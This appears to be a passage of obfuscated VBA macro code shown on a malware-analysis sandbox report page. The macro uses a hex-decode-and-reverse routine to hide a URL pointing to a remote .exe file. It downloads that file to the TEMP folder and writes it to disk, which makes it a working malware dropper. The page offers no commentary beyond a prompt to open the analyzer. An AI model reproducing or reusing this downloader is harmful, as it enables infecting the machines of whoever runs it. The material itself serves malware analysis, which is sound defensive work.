Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("756B6169796D6B656765656A61767079646F6E6D616C6E78656F737A6D6B6467616465676E6C6A68787A6B61786D6F71")) For Binary As #61689
Put #61689, , tcbsngjahhrhgbagbjxnpuptlsigwallfgbolukfwaspdzis
Close #61689
tuzhjiawhipevobwcrisufmhyahllnagdxlgunsyarqbhkmf:
End Function
Sub TFCVDJEJBJJ()
OJFXJUFZDBX StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6578652E312F736567616D692F6F722E646172612D6473702F2F3A70747468")), Environ("TEMP") & "\VGOMMYAIMDT.exe"
End Sub
Public Function trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy(ByVal cuvibyucfbvYCy As String) As String
Dim oiuytevdfb4bf As Long
For oiuytevdfb4bf = 1 To Len(cuvibyucfbvYCy) Step 2
trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy = trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy & Chr$(Val("&H" & Mid$(cuvibyucfbvYCy, oiuytevdfb4bf, 2)))
Next oiuytevdfb4bf
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.